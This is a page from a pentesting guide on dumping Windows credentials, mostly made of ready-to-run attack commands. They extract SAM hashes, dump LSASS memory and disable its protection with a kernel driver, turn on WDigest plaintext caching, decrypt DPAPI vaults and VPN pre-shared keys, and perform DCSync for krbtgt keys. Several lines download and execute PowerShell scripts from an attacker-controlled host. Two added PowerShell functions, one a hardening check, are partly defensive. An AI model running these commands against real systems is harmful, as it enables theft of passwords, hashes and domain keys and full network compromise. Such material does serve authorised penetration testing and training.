The Pentesting Guide

Dumping Credentials

Last updated 1 month ago

Dumping Windows credentials is a common technique used to assess the security posture of a network. It involves extracting sensitive information such as usernames and password hashes, which is a goldmine for attackers if left unaddressed.

This section explores some of the key methods employed during penetration testing to dump Windows credentials.

Mimikatz

Once you are an administrator on a Windows system, you can retrieve the NTLM hashes of the system's accounts with Mimikatz.

Most of the following commands will require adding "privilege::debug" "token::elevate" to become NT AUTHORITY\SYSTEM from Administrator, unless you already are NT AUTHORITY\SYSTEM.

Mimikatz commands have the following form:

module::command <parameter>

SAM (Local Windows credentials) - Local

ℹ️ Requires SYSTEM (or local administrator) permissions.

Local Windows credentials are stored in the Security Account Manager (SAM) database as password hashes in the NTLM hash format.

There are several alternatives to obtain the SAM database using a cmd.exe prompt with high privileges.

"privilege::debug" "token::elevate" "lsadump::sam" "exit"

If you can't obtain the SAM credentials this way, it is usually because the SAM and SYSTEM hives are locked while Windows is running, but there are several workarounds to obtain them.

Obtain SAM & SYSTEM (ShadowCopy)

  1. Create a shadow copy.

wmic shadowcopy call create Volume='C:\'
  2. List the shadow copies to check that it was created successfully.

vssadmin list shadows
[...]
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[...]
  3. Copy the files to your folder.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\Windows\Tasks\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\Windows\Tasks\system

Obtain SAM & SYSTEM (Windows Registry)

The SAM and SYSTEM files can be obtained from the Windows Registry.

reg save HKLM\sam C:\Windows\Tasks\sam
reg save HKLM\system C:\Windows\Tasks\system

Decrypt SAM with SYSTEM creds

Once you have obtained the SAM and SYSTEM files, you can use creddump7, Mimikatz or secretsdump to obtain the machine's credentials.

  • creddump7

pip2.7 install pycryptodome
git clone https://github.com/Neohapsis/creddump7
python2.7 creddump7/pwdump.py system sam
  • Mimikatz

"lsadump::sam /system:.\system /sam:.\sam" "exit"
  • secretsdump (local)

secretsdump.py -sam SAM -system SYSTEM [-SECURITY SECURITY] local

Local Administrator Password Solution (LAPS)

LAPS addresses the security challenge of managing local administrator account passwords by automatically and regularly rotating them. This helps to minimize the risk associated with using static or shared passwords across multiple systems.

LAPS introduces two new attributes for the computer object into Active Directory. The first is ms-mcs-AdmPwdExpirationTime, which registers the expiration time of a password as directed through a group policy. The second is ms-mcs-AdmPwd, which contains the clear text password of the local administrator account.

There are several ways to detect whether LAPS is enabled on the domain or on the machine you have access to:

  • Local: check whether the LAPS client-side extension DLL exists at any of the following paths.

Get-ChildItem "$env:ProgramFiles\LAPS\CSE\Admpwd.dll"
Get-ChildItem 'C:\Program Files\LAPS\CSE\Admpwd.dll'
Get-ChildItem 'C:\Program Files (x86)\LAPS\CSE\Admpwd.dll'
  • Domain:

# Alternative 1
(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/powerview.ps1') | IEX
get-netcomputer -Filter "(ms-mcs-admpwdexpirationtime=*)" | select dnshostname

# Alternative 2
(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/LAPSToolkit.ps1') | IEX;  Find-LAPSDelegatedGroups

There are several alternatives to obtain the LAPS password.

Alternative 1 - LAPSToolkit

(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/powerview.ps1') | IEX
(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/LAPSToolkit.ps1') | IEX;
# List all computers that are set up with LAPS and display the hostname, the clear text password, and the expiration time
Get-LAPSComputers

Alternative 2 - Get-ADObject

(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/PowerView.ps1') | IEX
Get-ADObject -Name <COMPUTER_NAME> -DomainController <DC_IP> -Properties ms-mcs-admpwd

Alternative 3 - Metasploit

use post/windows/gather/credentials/enum_laps
set session 1
exploit

Alternative 4 - Get-LAPSPasswords

(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/Get-LAPSPasswords.ps1') | IEX;
Get-LAPSPasswords -DomainController <DC> -Credential <DOMAIN>\administrator

Local Security Authority Subsystem Service (LSASS)

The Local Security Authority Subsystem Service (LSASS) is the Windows process that enforces the local security policy and handles user logon sessions. Because it keeps the credential material of those sessions in memory, it is a primary target for credential extraction.

The following extracts credentials from the memory of the process that handles user logon sessions.

"privilege::debug" "token::elevate" "sekurlsa::logonPasswords" "lsadump::secrets" "exit"

Local Security Authority (LSA) Protection Evasion

Check whether LSA protection (RunAsPPL) is enabled:

Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"

To disable PPL protection, the kernel must be patched by loading a new driver (mimidrv.sys), after which the protection can be removed from LSASS.

There are three approaches:

mimidrv.sys - Mimikatz.exe

Upload mimidrv.sys and mimikatz.exe on the same folder, so Mimikatz can find the file and create the service.

mimidrv.sys - Invoke-Mimikatz

Sadly, Invoke-Mimikatz doesn't look for the file mimidrv.sys, so we need to create and start the service ourselves. To do so, upload mimidrv.sys to a folder that the system can access and then:

cmd /c 'sc create mimidrv binPath= C:\Windows\Tasks\mimidrv.sys type= kernel start= demand'
cmd /c 'sc start mimidrv'

Disable PPL

This command:

  1. Becomes "NT AUTHORITY\SYSTEM" to load the driver

  2. Loads mimidrv.sys

  3. Disables the PPL protection for LSASS

  4. Dumps cached credentials

  5. Dumps secrets from the registry

"privilege::debug" "token::elevate" "!+" "!processprotect /process:lsass.exe /remove"  "sekurlsa::logonpasswords" "lsadump::secrets"  "sekurlsa::dpapi" "exit"

PPLKiller

This is a different alternative so that you do not have to use Mimikatz to load a kernel driver.

  1. Install the driver: PPLKiller.exe /installDriver

  2. Disable the protection: PPLKiller.exe /disableLSAProtection

  3. Obtain the information:

"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::secrets"  "sekurlsa::dpapi" "exit"

Dumping LSASS process memory

Because the memory of the LSASS process might contain plaintext credentials, NTLM hashes or Kerberos tickets, it is useful to dump it for offline processing. This can be achieved in two different ways:

  • GUI Alternative:

  1. Open Task Manager and go to "Details" tab

  2. Look for "lsass.exe" process

  3. Right click "Create Dump File"

  • CLI:

As NT AUTHORITY\SYSTEM, execute the following command:

.\procdump64.exe -accepteula -ma lsass.exe lsass.dmp

Finally, extract logon passwords:

.\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"

Data Protection API (DPAPI)

The Data Protection API (DPAPI) is a feature in Windows operating systems that provides a way to encrypt and decrypt sensitive data by using the user or machine credentials as a key. It is designed to help developers protect user data by providing a simple yet effective way to encrypt and decrypt data.

DPAPI is commonly used by applications to protect user data, such as web browsers to store user passwords, email clients to store user credentials, and other applications that store sensitive information.

The way the Windows Credential Manager works is a bit confusing at first - if you read up on the subject, you'll find both the terms "Vaults" and "Credentials". A "vault" essentially holds records of encrypted credentials and a reference to the encrypted blobs. Windows has two vaults: Web Credentials (for storing browser credentials) and Windows Credentials (for storing credentials saved by mstsc, etc). A "credential" is the actual encrypted credential blob.

The credentials are usually stored at C:\Users\<USER>\AppData\Local\Microsoft\Credentials.

Enumerate

There are several ways to list the vaults.

  • VaultCMD

vaultcmd /list
vaultcmd /listcreds:"<VAULT>" /all
  • Seatbelt

# Credentials saved in the Windows Vault (i.e. logins from Internet Explorer and Edge).
.\Seatbelt.exe WindowsVault

# Windows credential DPAPI blobs
.\Seatbelt.exe WindowsCredentialFiles
====== WindowsCredentialFiles ======

  Folder : C:\Users\User\AppData\Local\Microsoft\Credentials\

    FileName     : 6C33AC85D0C4DCEAB186B3B2E5B1AC7C
    Description  : Local Credential Data
    MasterKey    : bfc5090d-22fe-4058-8953-47f6882f549e

# List DPAPI master keys
.\Seatbelt.exe DpapiMasterKeys
Folder : C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104
LastAccessed  LastModified   FileName
============  =============  ====================================
1/16/2023     5:56:24 PM     487e7db0-f4fh-4301-8248-c225d49c5ah7
1/16/2023     5:56:35 PM     bfc5090d-22fe-4058-8953-47f6882f549e

[*] Use the Mimikatz "dpapi::masterkey" module with appropriate arguments (/pvk or /rpc) to decrypt
[*] You can also extract many DPAPI masterkeys from memory with the Mimikatz "sekurlsa::dpapi" module
[*] You can also use SharpDPAPI for masterkey retrieval

Obtaining the keys

.\mimikatz.exe !sekurlsa::dpapi

# This will only work if executed in the context of the user who owns the key. If your Beacon is running as another user or SYSTEM, you must impersonate the target user first, then execute the command using the `@` modifier.
mimikatz dpapi::masterkey /rpc /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<FOLDER>\<MASTER_KEY> 

Vault decryption

"dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\<VAULT_FILENAME> /masterkey:<MASTERKEY>" "exit"

Scheduled Tasks Credentials

Some scheduled tasks store user credentials at C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials.

These credentials can be decrypted with the following commands:

1. Obtain the GUID of the master key

.\mimikatz.exe "dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<FILE_NAME>"

2. Dump the creds

.\mimikatz.exe "privilege::debug" "token::elevate" "!sekurlsa::dpapi" "exit"

3. Decrypt the credentials

.\mimikatz.exe dpapi::cred /in:C:\Windows\System32\config\syst

Kerberos Encryption Keys

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::ekeys"'

.\SafetyKatz.exe "sekurlsa::ekeys"

WDigest Authentication

When the WDigest Authentication protocol is enabled, plain text passwords are stored in the Local Security Authority Subsystem Service (LSASS) exposing them to the pentester.

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
.\mimikatz.exe "sekurlsa::wdigest"
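
As an added example (not code from The Pentesting Guide), the following PowerShell function combines the three host-side checks this page touches on (the LAPS CSE DLL paths under LAPS, the RunAsPPL query under LSA Protection Evasion, and the WDigest UseLogonCredential value above) into one read-only posture report that shows the current value beside the hardened one. It assumes an elevated PowerShell session on the host being assessed; the function name Get-CredentialDumpingPosture is ours.

```powershell
# Added example, not from the guide: read-only check of the three settings this
# page discusses. Assumes an elevated session on the host being assessed.
function Get-CredentialDumpingPosture {
    [CmdletBinding()]
    param()

    $results = New-Object System.Collections.Generic.List[object]

    # 1. LSA protection. RunAsPPL = 1 (or 2 on builds that support the mode without
    #    a UEFI lock) runs LSASS as a protected process; a missing value means off.
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' `
                            -Name 'RunAsPPL' -ErrorAction SilentlyContinue
    $runAsPpl = if ($lsa) { [int]$lsa.RunAsPPL } else { 0 }
    $results.Add([pscustomobject]@{
        Check    = 'LSA protection (RunAsPPL)'
        Current  = $runAsPpl
        Hardened = ($runAsPpl -ge 1)
        Expected = 'RunAsPPL = 1 (REG_DWORD) under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, then reboot'
    })

    # 2. WDigest. UseLogonCredential = 1 keeps plaintext passwords in LSASS;
    #    0 (or no value on current Windows releases) turns that off.
    $wd = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' `
                           -Name 'UseLogonCredential' -ErrorAction SilentlyContinue
    $useLogonCred = if ($wd) { [int]$wd.UseLogonCredential } else { 0 }
    $results.Add([pscustomobject]@{
        Check    = 'WDigest (UseLogonCredential)'
        Current  = $useLogonCred
        Hardened = ($useLogonCred -eq 0)
        Expected = 'UseLogonCredential = 0 (REG_DWORD) or absent'
    })

    # 3. LAPS client-side extension, at the paths the page lists.
    $lapsDll = @("$env:ProgramFiles\LAPS\CSE\Admpwd.dll",
                 "${env:ProgramFiles(x86)}\LAPS\CSE\Admpwd.dll") | Where-Object { Test-Path $_ }
    $lapsCurrent = if ($lapsDll) { $lapsDll -join '; ' } else { 'not found' }
    $results.Add([pscustomobject]@{
        Check    = 'LAPS CSE installed'
        Current  = $lapsCurrent
        Hardened = [bool]$lapsDll
        Expected = 'Admpwd.dll present and the local administrator password managed by LAPS'
    })

    return $results
}

Get-CredentialDumpingPosture | Format-Table -AutoSize -Wrap
```

Each row reports Hardened = False when the host is in the state the techniques on this page rely on (no LSA protection, WDigest credential caching on, no LAPS), together with the value to set; an absent registry value is treated as 0 so the report does not silently pass a host where the key was never created.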

Dumping secrets

Originally, the LSA secrets contained cached domain records. Later, Windows developers expanded the application area for storage. At this moment, they can store PC users' text passwords, service account passwords (for example, those that must be run by a certain user to perform certain tasks), Internet Explorer passwords, RAS connection passwords, SQL and CISCO passwords, SYSTEM account passwords, private user data like EFS encryption keys, and a lot more. For example, the NL$KM secret contains the cached domain password encryption key.

.\mimikatz.exe "token::elevate" "lsadump::secrets" "exit"
secretsdump [-just-dc] <DOMAIN>/<USERNAME>:'<PASSWORD>'@<DC>

VPN credentials

It might be the case that you have compromised a computer that contains VPN profiles with a Pre-Shared Key and stored user credentials.

The general information about the VPN, such as the domain or IP address, is found in:

C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk

In order to dump the information, run lsadump::secrets and look for the secret "L$_RasConnectionCredentials".

"privilege::debug" "token::elevate"  "lsadump::secrets" "exit"
[...]
Secret  : L$_RasConnectionCredentials#0
cur/hex : 30 00 00 00 00 00 05 00 30 80 ab 62 21 85 f3 42 8a 33 26 87 51 46 82 20 0e 00 00 00 73 00 65 00 63 00 72 00 65 00 74 00 00 00 00 00 00 00 00 00 48 00 00 00 00 00 05 00 b5 b0 fe 50 59 98 6d 49 8f 31 4e 4c 77 24 4f 5a 28 00 00 00 79 00 6f 00 75 00 72 00 5f 00 70 00 72 00 65 00 5f 00 73 00 68 00 61 00 72 00 65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 50 00 00 00 00 00 05 00 d4 dd fb 7c b6 f3 49 47 99 52 56 e9 ef 91 76 41 2a 00 00 00 76 00 70 00 6e 00 5f 00 31 00 5f 00 70 00 72 00 65 00 2d 00 73 00 68 00 61 00 72 00 65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 05 00 5a 39 4b 1f 87 b1 0a 4e aa ad c0 56 3a 3d c1 91 2a 00 00 00 76 00 70 00 6e 00 5f 00 32 00 5f 00 70 00 72 00 65 00 2d 00 73 00 68 00 61 00 72 00 65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00

After decoding the values from HEX, the Pre-Shared keys will appear as follows, with three "NULL" bytes at the beginning and end of the password.

Then, if the user has stored the credentials, they will appear under the secret "RasDialParams!S-1-5-21-...".
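
As an added example (not code from The Pentesting Guide), the following PowerShell function splits the L$_RasConnectionCredentials blob shown above into its records and decodes the UTF-16LE strings, so the layout behind "decoding the values from HEX" is visible to an analyst who needs to know exactly which pre-shared keys a compromised host exposed and therefore which ones to rotate. The record layout it walks (a length-prefixed record, four flag bytes, a GUID, a length-prefixed UTF-16LE string and zero padding) is our reading of the sample bytes on this page, not a documented format; the function name ConvertFrom-RasConnectionCredentials is ours, and the sample hex is the page's own.

```powershell
# Added example, not from the guide: walk the L$_RasConnectionCredentials blob
# and decode its UTF-16LE strings. Record layout is our reading of the sample
# on this page (an assumption, not a documented format):
#   uint32 recordLength | 4 bytes (00 00 05 00 in the sample) | 16-byte GUID |
#   uint32 stringLength (bytes, terminator included) | UTF-16LE text | zero padding
function ConvertFrom-RasConnectionCredentials {
    param([Parameter(Mandatory)][string]$HexDump)

    $bytes = [byte[]]($HexDump -split '\s+' | Where-Object { $_ -ne '' } |
                      ForEach-Object { [Convert]::ToByte($_, 16) })
    $offset = 0
    # 28 = 4 (length) + 4 (flags) + 16 (GUID) + 4 (string length): the fixed header.
    while ($offset + 28 -le $bytes.Length) {
        $recordLength = [int][BitConverter]::ToUInt32($bytes, $offset)
        if ($recordLength -lt 28 -or $offset + $recordLength -gt $bytes.Length) { break }
        $strLen = [int][BitConverter]::ToUInt32($bytes, $offset + 24)
        if ($strLen -gt $recordLength - 28) { break }   # string cannot leave its record
        $guid = [guid]::new([byte[]]$bytes[($offset + 8)..($offset + 23)])
        $text = [Text.Encoding]::Unicode.GetString($bytes, $offset + 28, $strLen).TrimEnd([char]0)
        [pscustomobject]@{ Guid = $guid; Text = $text; RecordLength = $recordLength }
        $offset += $recordLength
    }
}

# The hex dump shown on this page (the page's own sample data, not real keys).
$sample = @'
30 00 00 00 00 00 05 00 30 80 ab 62 21 85 f3 42 8a 33 26 87 51 46 82 20 0e 00 00 00
73 00 65 00 63 00 72 00 65 00 74 00 00 00 00 00 00 00 00 00
48 00 00 00 00 00 05 00 b5 b0 fe 50 59 98 6d 49 8f 31 4e 4c 77 24 4f 5a 28 00 00 00
79 00 6f 00 75 00 72 00 5f 00 70 00 72 00 65 00 5f 00 73 00 68 00 61 00 72 00 65 00
64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00
50 00 00 00 00 00 05 00 d4 dd fb 7c b6 f3 49 47 99 52 56 e9 ef 91 76 41 2a 00 00 00
76 00 70 00 6e 00 5f 00 31 00 5f 00 70 00 72 00 65 00 2d 00 73 00 68 00 61 00 72 00
65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00
50 00 00 00 00 00 05 00 5a 39 4b 1f 87 b1 0a 4e aa ad c0 56 3a 3d c1 91 2a 00 00 00
76 00 70 00 6e 00 5f 00 32 00 5f 00 70 00 72 00 65 00 2d 00 73 00 68 00 61 00 72 00
65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00
'@

ConvertFrom-RasConnectionCredentials -HexDump $sample | Format-Table -AutoSize
```

On the sample above the loop yields one record per string, with the GUID that precedes it; the two length guards make the walk stop cleanly on a truncated dump instead of reading past the buffer, and the trailing zero bytes the page mentions are the string terminator plus padding to the record length.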

DCSync

Performs a DCSync, obtaining the Kerberos krbtgt keys, domain secrets, etc.

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"'

Browser Credentials

Some credentials might be stored in the victim's browser. They can be found in any of the following paths (relative to the user's profile):

AppData\Roaming\Mozilla\Firefox\Profiles\
AppData\Local\Google\Chrome\User Data\Default\Login Data
AppData\Local\Microsoft\Edge\User Data\Default\Login Data

If any of those paths exists, credentials might be stored in the browser.

Notes

ℹ️ You must be NT AUTHORITY\SYSTEM.

ℹ️ PPLKiller: open PPLKiller.sln with Visual Studio 2019 and build a Release binary, which will be saved in PPLKiller\x64\Release\PPLKiller.exe.

ℹ️ You must be local admin on the machine where the key is cached. Learn more about Mimikatz DPAPI in the Mimikatz Wiki.

ℹ️ There is a known issue where Mimikatz may incorrectly label all of the hashes as des_cbc_md4.

ℹ️ The user backup could retrieve important information about the domain.

ℹ️ You need to use the latest version of Mimikatz, or the secret will only appear as cur/text: <ID>.

ℹ️ This attack requires Domain Admin privileges.

References

  • Mimikatz
  • Creddump7
  • PPLKiller
  • Mimikatz Wiki